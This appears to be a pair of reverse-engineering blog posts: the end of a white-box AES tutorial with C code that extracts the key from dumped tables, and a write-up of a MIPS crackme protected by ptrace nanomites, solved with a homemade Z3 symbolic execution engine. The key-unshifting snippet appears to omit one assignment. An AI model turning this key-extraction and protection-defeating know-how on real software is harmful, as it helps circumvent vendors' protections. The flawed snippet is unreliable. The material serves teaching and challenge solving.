void aes128_enc_wb_final(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned int aa = Tyboxes[i][j * 4 + 0][out[j * 4 + 0]];
            unsigned int bb = Tyboxes[i][j * 4 + 1][out[j * 4 + 1]];
            unsigned int cc = Tyboxes[i][j * 4 + 2][out[j * 4 + 2]];
            unsigned int dd = Tyboxes[i][j * 4 + 3][out[j * 4 + 3]];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]]) | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]]) | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]]) | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]]) | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes_[j][out[j]];
        out[j] = x;
    }
}

It's cute isn't it?

Attacking the white-box: extract the key

As the title says, this white-box implementation is really insecure: which means that if you have access to an executable with that kind of white-box you just have to extract Tyboxes[0] & do a little magic to extract the key.

If it's not already obvious to you, you just have to remember how we actually compute the values inside that big tables ; look carefully at those two lines:

unsigned char c = S_box[x ^ round_keys[r][i]];
Tyboxes[r][i][x] = Ty[i % 4][c];

In our case, r is 0, i will be the byte index of the round key 0 (which is the AES key) & we can also set x to a constant value: let's say 0 or 1 for instance. S_box is known, Ty too as this transformation is always the same (it doesn't depend on the key). Basically we just need to brute-force round_keys[r][i] with every values a byte can take. If the computed value is equal to the one in the dumped Tyboxes, then we have extracted one byte of the round key & we can go find the next one.

Attentive readers noticed that we are not going to actually extract the encryption key per-se, but ShiftRows(key) instead (remember that we needed to apply this transformation to build our white-box). But again, ShiftRows being not key-dependent we can invert this operation easily to really have the plain encryption key this time.

Here is the code that does what I just described:

unsigned char scrambled_key[16] = { 0 };
for (size_t i = 0; i < 16; ++i)
{
    // unsigned char c = S_box[0 ^ X0];
    // Tyboxes[0][0][0] = Ty[0][c];
    unsigned int value = Tyboxes_round0_dumped[i][1];
    // Now we generate the 0x100 possible values for the character 0 & wait to find a match
    for (size_t j = 0; j < 0x100; ++j)
    {
        unsigned char c = S_box[1 ^ j];
        unsigned int computed_value = Ty[i % 4][c];
        if (computed_value == value)
            scrambled_key[i] = j;
    }
}

{
    unsigned char tmp1, tmp2;
    // 8-bits right rotation of the second line
    tmp1 = scrambled_key[13];
    scrambled_key[13] = scrambled_key[9];
    scrambled_key[9] = scrambled_key[5];
    scrambled_key[1] = tmp1;

    // 16-bits right rotation of the third line
    tmp1 = scrambled_key[10];
    tmp2 = scrambled_key[14];
    scrambled_key[14] = scrambled_key[6];
    scrambled_key[10] = scrambled_key[2];
    scrambled_key[6] = tmp2;
    scrambled_key[2] = tmp1;

    // 24-bits right rotation of the last line
    tmp1 = scrambled_key[15];
    scrambled_key[15] = scrambled_key[3];
    scrambled_key[3] = scrambled_key[7];
    scrambled_key[7] = scrambled_key[11];
    scrambled_key[11] = tmp1;
}

printf("Key successfully extracted & UnShiftRow'd:\n");
for (size_t i = 0; i < 16; ++i)
    printf("\\x%.2x", scrambled_key[i]);

Obfuscating it?

This is basically the part where you have no limits, where you can exercise your creativity & develop stuff. I'll just talk about ideas & obvious things, a lot of them are directly taken from @elvanderb's challenge so I guess I owe him yet another beer.

The first things you can do for free are:

  • Unrolling the implementation to make room for craziness
  • Use public LLVM passes on the unrolled implementation to make it even more crazy

The other good idea is to try to make less obvious key elements in your implementation: basically the AES state, the tables & their structures. Those three things give away quite some important information about how your implementation works, so making a bit harder to figure those points out is good for us. Instead of storing the AES state inside a contiguous memory area of 16 bytes, why not use 16 non-contiguous variables of 1 byte? You can go even further by using different variables for every round to make it even more confusing.

You can also apply that same idea to the different arrays our implementation uses: do not store them in a contiguous memory area, dispatch them all over the memory & transform them in one dimension arrays instead.

We could also imagine a generic array "obfuscation" where you add several "layers" before reaching the value you are interested in:

  • Imagine an array [1,5,10,11] ; we could shuffle this one into [10, 5, 1, 11] and build the associated index table which would be [2, 1, 0, 3]
  • And now instead of accessing directly the first array, you retrieve the correct index first in the index table, shuffled[index[0]]
    • Obviously you could have as many indirections you want

To make everything always more confusing, we could build the primitives we need on top of crazy CPU extensions like SSE or MMX; or completely build a virtual software-processor..!

Do also try to shuffle everything that is "shufflable" ; here is simple graph that shows data-dependencies between the lines of our unrolled C implementation (an arrow from A to B means that A needs to be executed prior to B):

aes.svg
From here, you have everything you need to move the lines around & generate a "less normal" implementation (even that we can clearly see what I call synchronization points at the end of every round which is basically the calls to ShiftRows(out) ; but again we could get rid of those, and directly in-lining them etc):
def generate_shuffled_implementation_via_dependency_graph(dependency_graph, out_filename):
    '''This function is basically leveraging the graph we produced in the previous function
    to generate an actual shuffled implementation of the AES white-box without breaking any
    constraints, keeping the result of this new shuffled function the same as the clean version.'''
    lines = open('aes_unrolled_code.raw.clean.unique_aabbccdd', 'r').readlines()
    print ' > Finding the bottom of the graph..'
    last_nodes = set()
    for i in range(len(lines)):
        _, degree_o = dependency_graph.degree_iter(i, indeg = False, outdeg = True).next()
        if degree_o == 0:
            last_nodes.add(dependency_graph.get_node(i))

    assert(len(last_nodes) != 0)
    print ' > Good, check it out: %r' % last_nodes
    shuffled_lines = []
    step_n = 0
    print ' > Lets go'
    while len(last_nodes) != 0:
        print '  %.2d> Shuffle %d nodes / lines..' % (step_n, len(last_nodes))
        random.shuffle(list(last_nodes), random = random.random)
        shuffled_lines.extend(lines[int(i.get_name())] for i in last_nodes)
        step_n += 1

        print '  %.2d> Finding parents / stepping back ..' % step_n
        tmp = set()
        for node in last_nodes:
            tmp.update(dependency_graph.in_neighbors(node))
        last_nodes = tmp
        step_n += 1

    shuffled_lines = reversed(shuffled_lines)
    with open(out_filename, 'w') as f:
        f.write('''void aes128_enc_wb_final_unrolled_shuffled_%d(unsigned char in[16], unsigned char out[16])
{
memcpy(out, in, 16);
''' % random.randint(0, 0xffffffff))
        f.writelines(shuffled_lines)
        f.write('}')
    return shuffled_lines

Anyway, I wish I had time to implement what we just talked about but I unfortunately don't; if you do feel free to shoot me an email & I'll update the post with links to your code :-).

Last words

I hope this little post gave you enough to understand how white-box cryptography kind of works, how important is the design of the implementation and what sort of problems you can encounter. If you enjoyed this subject, here is a list of cool articles you may want to check out:

Every source file produced for this post has been posted on my github account right here: wbaes128.

Special thanks to my mate @__x86 for proof-reading!

Taming a wild nanomite-protected MIPS binary with symbolic execution: No Such Crackme

As last year, the French conference No Such Con returns for its second edition in Paris from the 19th of November until the 21th of November. And again, the brilliant Eloi Vanderbeken & his mates at Synacktiv put together a series of three security challenges especially for this occasion. Apparently, the three tasks have already been solved by awesome @0xfab which won the competition, hats off :).

To be honest I couldn't resist to try at least the first step, as I know that Eloi always builds really twisted and nice binaries ; so I figured I should just give it a go!

But this time we are trying something different though: this post has been co-authored by both Emilien Girault (@emiliengirault) and I. As we have slightly different solutions, we figured it would be a good idea to write those up inside a single post. This article starts with an introduction to the challenge and will then fork, presenting my solution and his.

As the article is quite long, here is the complete table of contents:

Table of contents:

REcon: Here be dragons

This part is just here to get things started: how to have a debugging environment, to know a bit more about MIPS and to know a bit more what the binary is actually doing.

MIPS 101

The first interesting detail about this challenge is that it is a MIPS binary ; it's really kind of exotic for me. I'm mainly looking at Intel assembly, so having the opportunity to look at an unknown architecture is always appealing. You know it's like discovering a new little toy, so I just couldn't help myself & started to read the MIPS basics.

This part is going to describe only the essential information you need to both understand and crack wide open the binary ; and as I said I am not a MIPS expert, at all. From what I have seen though, this is fairly similar to what you can see on an Intel x86 CPU:

  • It is little endian (note that it also exists a big-endian version but it won't be covered in this post),
  • It has way more general purpose registers,
  • The calling convention is similar to __fastcall: you pass arguments via registers, and get the return of the function in $v0,
  • Unlike x86, MIPS is RISC, so much simpler to take in hand (trust me on that one),
  • Of course, there is an IDA processor,
  • Linux and the regular tools also exists for MIPS so we will be able to use the "normal" tools we are used to use,
  • It also uses a stack, much less than x86 though as most of the things happening are in registers (in the challenge at least).

Setting up a proper debugging environment

The answer to that question is Qemu, as expected. You can even download already fully prepared & working Debian images on aurel32's website.

overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2
overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta
overclok@wildout:~/chall/nsc2014$ cat start_vm.sh
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -vga none -append "root=/dev/sda1 console=tty0" -nographic
overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.2.0-4-4kc-malta ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 Debian 3.2.51-1
[...]
debian-mipsel login: root
Password:
Last login: Sat Oct 11 00:04:51 UTC 2014 on ttyS0
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@debian-mipsel:~# uname -a
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips GNU/Linux

Feel free to install your essentials in the virtual environment, some tools might come handy (it should take a bit of time to install them though):

root@debian-mipsel:~# aptitude install strace gdb gcc python
root@debian-mipsel:~# wget https://raw.githubusercontent.com/zcutlip/gdbinit-mips/master/gdbinit-mips
root@debian-mipsel:~# mv gdbinit-mips ~/.gdbinit
root@debian-mipsel:~# gdb -q /home/user/crackmips
Reading symbols from /home/user/crackmips...(no debugging symbols found)...done.
(gdb) b *main
Breakpoint 1 at 0x402024
(gdb) r 'doar-e ftw'
Starting program: /home/user/crackmips 'doar-e ftw'
-----------------------------------------------------------------
[registers]
  V0: 7FFF6D30  V1: 77FEE000  A0: 00000002  A1: 7FFF6DF4
  A2: 7FFF6E00  A3: 0000006C  T0: 77F611E4  T1: 0FFFFFFE
  T2: 0000000A  T3: 77FF6ED0  T4: 77FE5590  T5: FFFFFFFF
  T6: F0000000  T7: 7FFF6BE8  S0: 00000000  S1: 00000000
  S2: 00000000  S3: 00000000  S4: 004FD268  S5: 004FD148
  S6: 004D0000  S7: 00000063  T8: 77FD7A5C  T9: 00402024
  GP: 77F67970  S8: 0000006C  HI: 000001A5  LO: 00005E17
  SP: 7FFF6D18  PC: 00402024  RA: 77DF2208
-----------------------------------------------------------------
[code]
=> 0x402024 <main>:     addiu   sp,sp,-72
    0x402028 <main+4>:   sw      ra,68(sp)
    0x40202c <main+8>:   sw      s8,64(sp)
    0x402030 <main+12>:  move    s8,sp
    0x402034 <main+16>:  sw      a0,72(s8)
    0x402038 <main+20>:  sw      a1,76(s8)
    0x40203c <main+24>:  lw      v1,72(s8)
    0x402040 <main+28>:  li      v0,2

And finally you should be able to run the wild beast:

root@debian-mipsel:~# /home/user/crackmips
usage: /home/user/crackmips password
root@debian-mipsel:~# /home/user/crackmips 'doar-e ftw'
WRONG PASSWORD

Brilliant :-).

The big picture

Now that we have a way of both launching and debugging the challenge, we can open the binary in IDA and start to understand what type of protection scheme is used. As always at that point, we are really not interested in details: we just want to understand how it works and what parts we will have to target to get the good boy message.

After a bit of time in IDA, here is how works the binary:

  1. It checks that the user supplied one argument: the serial
  2. It checks that the supplied serial is 48 characters long
  3. It converts the string into 6 DWORDs (/!\ pitfall warning: the conversion is a bit strange, be sure to verify your algorithm)
  4. The beast forks in two:
    1. [Father] It seems, somehow, this one is driving the son, more on that later
    2. [Son] After executing a big chunk of code that modifies (in place) the 6 original DWORDs, they get compared against the following string [ Synacktiv + NSC = <3 ]
    3. [Son] If the comparison succeeds you win, else you loose

Basically, we need to find the 6 input DWORDs that are going to generate the following ones in output: 0x7953205b, 0x6b63616e, 0x20766974, 0x534e202b, 0x203d2043, 0x5d20333c. We also know that the father is going to interact with its son, so we need to study both codes to be sure to understand the challenge properly. If you prefer code, here is the big picture in C:

int main(int argc, char *argv[])
{
    DWORD serial_dwords[6] = {0};
    if(argc != 2)
        Usage();

    // Conversion
    a2i(argv[1], serial_dwords);

    pid_t pid = fork();
    if(pid != 0)
    {
        // Father
        // a lot of stuff going on here, we will see that later on
    }
    else
    {
        // Son
        // a lot of stuff going on here, we will see that later on

        char *clear = (char*)serial_dwords;
        bool win = memcmp(clear, "[ Synacktiv + NSC = <3 ]", 48);
        if(win)
            GoodBoy();
        else
            BadBoy();
    }
}

Let's get our hands dirty

Father's in charge

The first thing I did after having the big picture was to look at the code of the father. Why? The code seemed a bit simpler than the son's one, so I figured studying the father would make more sense to understand what kind of protection we need to subvert. You can even crank up strace to have a clearer overview of the syscalls used:

root@debian-mipsel:~# strace -i /home/user/crackmips $(python -c 'print "1"*48')
[7734e224] execve("/home/user/crackmips", ["/home/user/crackmips", "11111111111111111111111111111111"...], [/* 12 vars */]) = 0
[...]
[77335e70] clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x77491068) = 2539
[77335e70] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7733557c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[...]

That's an interesting output that I didn't expect at all actually. What we are seeing here is the father driving its son by modifying, potentially (we will find out that later), its context every time the son is SIGTRAPing (note waitpid second argument).

From here, if you are quite familiar with the different existing type of software protections (I'm not saying I am an expert in this field but I just happened to know that one :-P) you can pretty much guess what that is: nanomites this is!

Nanomites 101

Namomites are quite a nice protection. Though, it is quite a generic name ; you can really use that protection scheme in whatever way you like: your imagination is the only limit here. To be honest, this was the first time I saw this kind of protection implemented on a Unix system ; really good surprise! It usually works this way:

  1. You have two processes: a driver and a driven ; a father and a son
  2. The driver is attaching itself to the driven one with the debug APIs available on the targeted platform (ptrace here, and CreateProcess/DebugActiveProcess on Windows)
    1. Note that, by design you won't be able to attach yourself to the son as both Windows and Linux prevent that (by design): some people call that part the DebugBlocker
    2. You will able to debug the driver though
  3. Usually the interesting code is in the son, but again you can do whatever you want. Basically, you have two rules if you want an efficient protection:
    1. Make sure the driven process can't run without its driver and that they are really tied to each other
    2. The strength of the protection is that strong/intimate bound between the two processes
    3. Design your algorithm such that removing the driver is really difficult/painful/driving mad the attacker
  4. The driven process can call/notify the driver by just SIGTRAPing with an int3/break instruction for example

As I said, I see this protection scheme more like a recipe: you are free to customize it at your convenience really. If you want to read more on the subject, here is a list of links you should check out:

How the father works

Now it is time to took into details the father ; here is how it works:

  • The first thing it does is to waitpid until its son triggers a SIGTRAP
  • The driver retrieves the CPU context of the son process and more precisely its program counter: $pc
  • Then we have a huge block of arithmetic computations. But after spending a bit of time to study it, we can see that huge block as a black-box function that takes two parameters: the program counter of the son and some kind of counter value (as this code is going to be executed in a loop, for each SIGTRAP this variable is going to be incremented). It generates a single output which is a 32 bits value that I call the first magic value. Let's not focus on what the block is actually doing though, we will develop some tool in the next part to deal with that :-) so let's keep moving!

father_code.png
* This magic value is then used to find a specific entry in an array of QWORDs (606 QWORDs which is 6 times the number of break instructions in the son -- you will understand that a bit later don't worry). Basically, the code is going to loop over every single QWORD of this array until finding one that has the high DWORD equals to the magic value. From there you get another magic value which is the lowest DWORD of the matching QWORD. * Another huge block of arithmetic computations is used. Similarly to the first one, we can see it as a black-box function with two inputs: the second magic value and a round index (the son is executing its code 6 times, so this round index will start from 0 until 5 -- again this will be a bit clearer when we look at the son, so just keep this detail in your mind). The output of this function is a 32 bits value. Again, do not study this block, we don't need it. * The generated value is in fact a valid code address inside the son ; so straight after the computation, the father is going to modify the program counter in the previously retrieved CPU context. Once this is done, it calls ptrace with SETREGS to set the new CPU context of the son.

This is what roughly is going to be executed every time the son is going to hit a break instruction ; the father is definitely driving the son. And we can feel it now, the son is going to jump (via its father) through block of codes that aren't (necessary) contiguous in memory, so studying the son code as it is in IDA is quite pointless as those basic blocks aren't going to be executed in this order.

Long story short, the nanomites are used as some kind of runtime code flow scrambling primitive, isn't it exciting? Told you that @elvanderb is crazy :-).

Gearing up: Writing a symbolic executing engine

At that point, I can assure you that we need some tooling: we have studied the binary, we know how the main parts work and we just need to extract the different equations/formulas used by both the computation of the son's program counter and the serial verification algorithm. Basically the engine is going to be useful to study both the father and the son.

If you are not really familiar with symbolic execution, I recommend you take a little bit of time to read Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution and check out z3-playground if you are not really familiar with Z3 and its Python bindings.

This time I decided to not build that engine as an IDA Python script, but just to do everything myself. Do not be afraid though, even if it sounds scary it is really not: the challenge is a perfect environment for those kind of things. It doesn't use a lot of instructions, we don't need to support branches and nearly only arithmetic instructions are used.

I also chose to implement this engine in a way that we can also use it as a simple emulator. You can even use it as a decompiler if you want! The two other interesting points for us are:

  1. Once we run a piece of code in the symbolic engine, we will extract certain computations / formulas. Thanks to Microsoft's Z3 we will be able to retrieve input values that will generate specific output values: this is basically what you gain by using a solver and symbolic variables.
  2. But the other interesting point is that you still can use the extracted Z3 expressions as some kind of black-box functions. You know what the function is doing, kind of, but you don't know how ; and you are not interested in the how. You know the inputs, and the outputs. To obtain a concrete output value, you can just replace the symbolic variables by concrete values. This is really handy, especially when you are not only interested in finding input values to generate specific output values ; sometimes you just want to go both ways :-).

Anyway, after this long theoretical speech let's have a look at some code. The first important job of the engine is to be able to parse MIPS assembly: fortunately for us this is really easy. We are directly feeding plain-text MIPS disassembly directly copied from IDA to our engine:

def _parse_line(self, line):
  addr_seg, instr, rest = line.split(None, 2)
  args = rest.split(',')
  for i in range(len(args)):
    if '#' in args[i]:
        args[i], _ = args[i].split(None, 1)

  a0, a1, a2 = map(
    lambda x: x.strip().replace('$', '') if x is not None else x,
    args + [None]*(3 - len(args))
  )
  _, addr = addr_seg.split(':')
  return int(addr, 16), instr, a0, a1, a2

From here you have all the information you need: the instruction and its operands (None if an operand doesn't exist as you can have up to 3 operands). The other important job that follows is to handle the different type of operands ; here are the ones I encountered in the challenge:

  • General purpose register,
  • Stack-variable,
  • Immediate value.

To handle / convert those I created a bunch of dull / helper functions:

def _is_gpr(self, x):
  '''Is it a valid GPR name?'''
  return x in self.gpr

def _is_imm(self, x):
  '''Is it a valid immediate?'''
  x = x.replace('loc_', '0x')
  try:
    int(x, 0)
    return True
  except:
    return False

def _to_imm(self, x):
  '''Get an integer from a string immediate'''
  if self._is_imm(x):
    x = x.replace('loc_', '0x')
    return int(x, 0)
  return None

def _is_memderef(self, x):
  '''Is it a memory dereference?'''
  return '(' in x and ')' in x

def is_stackvar(self, x):
  '''Is is a stack variable?'''
  return ('(fp)' in x and '+' in x) or ('var_' in x and '+' in x)

def to_stackvar(self, x):
  '''Get the stack variable name'''
  _, var_name = x.split('+')
  return var_name.replace('(fp)', '')

Finally, we have to handle every different instructions and their encodings. Of course, you need to implement only the instructions you want: most likely the ones that are used in the code you are interested int. In a nutshell, this is the core of the engine. You can also use it to output valid Python/C lines if you fancy having a decompiler in your sleeve ; might be handy right?

This is what the core function looks like, it is really simple, dumb and so unoptimized ; but at least it's clear to me:

def step(self):
  '''This is the core of the engine -- you are supposed to implement the semantics
  of all the instructions you want to emulate here.'''
  line = self.code[self.pc]
  addr, instr, a0, a1, a2 = self._parse_line(line)
  if instr == 'sw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      self.logger.info('%s = $%s', var_name, a0)
      self.stack[var_name] = self.gpr[a0]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      self.logger.info('[%s + %s] = $%s', base, idx, a0)
      self.mem[computed_address] = self.gpr[a0]
    else:
      raise Exception('sw not implemented')
  elif instr == 'lw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      if var_name not in self.stack:
        self.logger.info(' WARNING: Assuming %s was 0', (var_name, ))
        self.stack[var_name] = 0
      self.logger.info('$%s = %s', a0, var_name)
      self.gpr[a0] = self.stack[var_name]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      if computed_address not in self.mem:
        value = raw_input(' WARNING %.8x is not in your memory store -- what value is there @0x%.8x?' % (computed_address, computed_address))
      else:
        value = self.mem[computed_address]
      self.logger.info('$%s = [%s+%s]', a0, idx, base)
      self.gpr[a0] = value
    else:
      raise Exception('lw not implemented')
[...]

The first level of if handles the different instructions, the second level of if handles the different encodings an instruction can have. The self.logger thingy is just my way to save the execution traces in files to let the console clean:

def __init__(self, trace_name):
  self.gpr = {
    'zero' : 0,
    'at' : 0,
    'v0' : 0,
    'v1' : 0,
# [...]
    'lo' : 0,
    'hi' : 0
  }

  self.stack = {}
  self.pc = 0
  self.code = []
  self.mem = {}
  self.stack_offsets = {}
  self.debug = False
  self.enable_z3 = False

  if os.path.exists('traces') == False:
      os.mkdir('traces')

  self.logger = logging.getLogger(trace_name)
  h = logging.FileHandler(
      os.path.join('traces', trace_name),
      mode = 'w'
  )

  h.setFormatter(
      logging.Formatter(
          '%(levelname)s: %(asctime)s %(funcName)s @ l%(lineno)d -- %(message)s',
          datefmt = '%Y-%m-%d %H:%M:%S'
      )
  )

  self.logger.setLevel(logging.INFO)
  self.logger.addHandler(h)

At that point, if I wanted only an emulator I would be done. But because I want to use Z3 and symbolic variables I want to get your attention on two common pitfalls that can cost you hours of debugging (trust me on that one :-():

  • The first one is that the operator __rshift__ isn't the logical right shift but the arithmetical one; which is quite different and can generate results you don't expect:
In [1]: from z3 import *

In [2]: simplify(BitVecVal(4, 3) >> 1)
Out[2]: 6

In [3]: simplify(LShR(BitVecVal(4, 3), 1))
Out[3]: 2

In [4]: 4 >> 1
Out[4]: 2

To workaround that I usually define my own _LShR function that does whatever is correct according to the operand types (yes we could also replace z3.BitVecNumRef.__rshift__ by LShR directly):

def _LShR(self, a, b):
  '''Useful hook function if you want to run the emulation
  with/without Z3 as LShR is different from >> in Z3'''
  if self.enable_z3:
    if isinstance(a, long) or isinstance(a, int):
      a = BitVecVal(a, 32)
    if isinstance(b, long) or isinstance(b, int):
      b = BitVecVal(b, 32)
    return LShR(a, b)
  return a >> b
  • The other interesting detail to keep in mind is that you can't have any overflow on BitVecs of the same size ; the result is automatically truncated. So if you happen to have mathematical operations that need to overflow, like a multiplication (this is used in the challenge), you should store the temporary result in a bigger temporary variable. In my case, I was supposed to store the overflow inside another register, $hi which is used to store the high DWORD part of the result. But because I wasn't storing the result in a bigger BitVec, $hi ended up always equal to zero which is quite a nice problem when you have to pinpoint this issue in thousands lines of assembly :-).
elif instr == 'multu':
  if self._is_gpr(a0) and self._is_gpr(a1) and a2 is None:
    self.logger.info('$lo = ($%s * $%s) & 0xffffffff', a0, a1)
    self.logger.info('$hi = ($%s * $%s) >> 32', a0, a1)
    if self.enable_z3:
      a0bis, a1bis = self.gpr[a0], self.gpr[a1]
      if isinstance(a0bis, int) or isinstance(a0bis, long):
        a0bis = BitVecVal(a0bis, 32)
      if isinstance(a1bis, int) or isinstance(a1bis, long):
        a1bis = BitVecVal(a1bis, 32)

      a064 = ZeroExt(32, a0bis)
      a164 = ZeroExt(32, a1bis)
      r = a064 * a164
      self.gpr['lo'] = Extract(31, 0, r)
      self.gpr['hi'] = Extract(63, 32, r)
  else:
    x = self.gpr[a0] * self.gpr[a1]
    self.gpr['lo'] = x & 0xffffffff
    self.gpr['hi'] = self._LShR(x, 32)

I think this is it really, you can now impress girls with your brand new shiny toy, check this out:

def main(argc, argv):
    print '=' * 50
    sym = MiniMipsSymExecEngine('donotcare.log')
    # DO NOT FORGET TO ENABLE Z3 :)
    sym.enable_z3 = True
    a = BitVec('a', 32)
    sym.stack['var'] = a
    sym.stack['var2'] = 0xdeadbeef
    sym.stack['var3'] = 0x31337
    sym.code = '''.doare:DEADBEEF                 lw      $v0, 0x318+var($fp)  # Load Word
.doare:DEADBEEF                 lw      $v1, 0x318+var2($fp)  # Load Word
.doare:DEADBEEF                 subu    $v0, $v1, $v0    #
.doare:DEADBEEF                 li      $v1, 0x446F8657  # Load Immediate
.doare:DEADBEEF                 multu   $v0, $v1         # Multiply Unsigned
.doare:DEADBEEF                 mfhi    $v1              # Move From HI
.doare:DEADBEEF                 subu    $v0, $v1         # Subtract Unsigned'''.split('\n')
    sym.run()

    print 'Symbolic mode:'
    print 'Resulting equation: %r' % sym.gpr['v0']
    print 'Resulting value if `a` is 0xdeadb44: %#.8x' % substitute(
        sym.gpr['v0'], (a, BitVecVal(0xdeadb44, 32))
    ).as_long()

    print '=' * 50
    emu = MiniMipsSymExecEngine('donotcare.log')
    emu.stack = sym.stack
    emu.stack['var'] = 0xdeadb44
    sym.stack['var2'] = 0xdeadbeef
    sym.stack['var3'] = 0x31337
    emu.code = sym.code
    emu.run()

    print 'Emulator mode:'
    print 'Resulting value when `a` is 0xdeadb44: %#.8x' % emu.gpr['v0']
    print '=' * 50
    return 1

Which results in:

PS D:\Codes\NoSuchCon2014> python .\mini_mips_symexec_engine.py
==================================================
Symbolic mode:
Resulting equation: 3735928559 +
4294967295*a +
4294967295*
Extract(63,
        32,
        1148159575*Concat(0, 3735928559 + 4294967295*a))
Resulting value if `a` is 0xdeadb44: 0x98f42d24
==================================================
Emulator mode:
